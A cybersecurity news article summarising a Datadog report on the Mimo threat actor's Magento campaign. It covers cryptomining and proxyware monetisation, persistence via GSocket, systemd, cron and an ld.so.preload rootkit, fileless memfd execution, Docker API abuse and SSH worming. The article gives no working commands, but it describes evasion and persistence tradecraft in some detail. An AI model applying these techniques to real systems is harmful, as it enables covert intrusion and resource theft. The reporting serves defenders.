Mimo Strikes Magento: New Campaign Shifts to Cryptojacking, Proxyjacking, & Stealthy Persistence
Do Son 
The once Craft CMS-focused threat actor known as Mimo—or Mimo’lette—has resurfaced with new vigor, broadening its scope and evolving into a persistent adversary. In its latest campaign, detailed by the Datadog Security Research team, Mimo has shifted focus from Craft to the Magento CMS platform, while incorporating advanced persistence techniques, memory-resident payloads, and dual monetization strategies via cryptojacking and proxyjacking.
“Mimo’s shift to Magento—coupled with the introduction of persistence mechanisms and new evasion techniques—highlights a significant evolution in their tactics, techniques, and procedures (TTPs),” the report states.
Mimo’s latest compromise vector involves exploiting PHP-FPM vulnerabilities within Magento installations. Although the exact vulnerability remains undetermined, Datadog observed the attacker conducting multi-day operations to maintain access and install malicious tooling. This marks a strategic platform expansion from previous campaigns.
“This represents a significant expansion in targeting… Mimo possesses multiple exploit capabilities beyond previously observed adversarial tradecraft,” the report writes.
To ensure continued access, Mimo uses GSocket, a legitimate penetration testing tool. Through encrypted connections and TOR support, GSocket allows adversaries to bypass NAT/firewall restrictions, while its daemon mode ensures automatic recovery post-reboot.
Persistence is maintained using:
- SystemD service units
- Legacy rc.local scripts
- Crontab entries with disguised process names (e.g., [kswapd0], [watchdogd])
The malicious binary is stored as ‘defunct’ and executed under names mimicking kernel-managed threads.
Perhaps Mimo’s most advanced evasion technique involves fileless execution through the memfd_create() syscall. This creates in-memory temporary files with executable bits, allowing malware to operate without ever touching disk storage.
“The memfd file descriptor naming convention used (memfd:[rcu_sched]) is particularly clever as it mimics legitimate kernel thread names,” the report explains.
Combined with a rootkit injected via /etc/ld.so.preload, this effectively hides processes, directories, and system calls from most monitoring tools.
Datadog’s analysis reveals a rotating infrastructure model, using staged command-and-control (C2) servers across operational phases. This rotation suggests strong operational security practices, likely leveraging compromised servers as stepping stones.
Mimo employs a dual monetization approach:
- XMRig cryptominer (UPX-packed) targets C3Pool to mine Monero
- IPRoyal’s hezb.x86_64 client converts victim bandwidth into profit
“Even if the cryptominer is detected and removed, the proxy component may remain unnoticed, ensuring continued revenue for the threat actor,” the report notes.
Mimo’s ambitions now include Docker infrastructure. The actor scans for misconfigured Docker APIs, spawning containers that retrieve and execute payloads using base64-encoded shell commands.
Example command:
This loader installs a Go-based, UPX-packed ELF binary as the primary payload—equipped with modular packages (files, cmd, exploit, cron) and SSH-based worming capabilities.
The malware attempts to propagate laterally by:
- Extracting SSH keys from known_hosts and config files
- Determining public IP using 8.8.8.8:80 connection
- Brute-forcing SSH access to nearby hosts using hardcoded usernames like admin, ubuntu, dev, and ec2-user
The use of the ec2-user username suggests that Mimo intends to target AWS environments.
Post-infection, the ELF binary leverages the /dev/shm tmpfs directory—writable even in read-only containers—to host its payload, executing it entirely in memory using forkexec(). The process name is randomly selected from a list of kernel thread names to enhance stealth.
The evolution of Mimo from CMS exploitation to cloud-native container attacks and multi-vector persistence paints a picture of an adversary who is not only financially motivated but increasingly sophisticated.
As Datadog warns, “This sophistication highlights the continuous development of Mimo’s evasion capabilities, indicating a persistent effort to bypass security measures and maintain multiple avenues of persistence while covering their tracks.”
Related Posts:
- Mimo’s Multi-Threat Campaign: From CoinMiner to Mimus Ransomware
- Exploit Kits, Cryptominers, Proxyjackers: The New Face of Selenium Grid Abuse
- Mimo Returns: CVE-2025-32432 Exploited in Cryptomining and Proxyware Campaigns
- Mispadu Banking Trojan Expands Reach, Targeting Europe and Beyond
- Data Breach at Okta Affects All Customer Support Users: Company Updates Scope
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
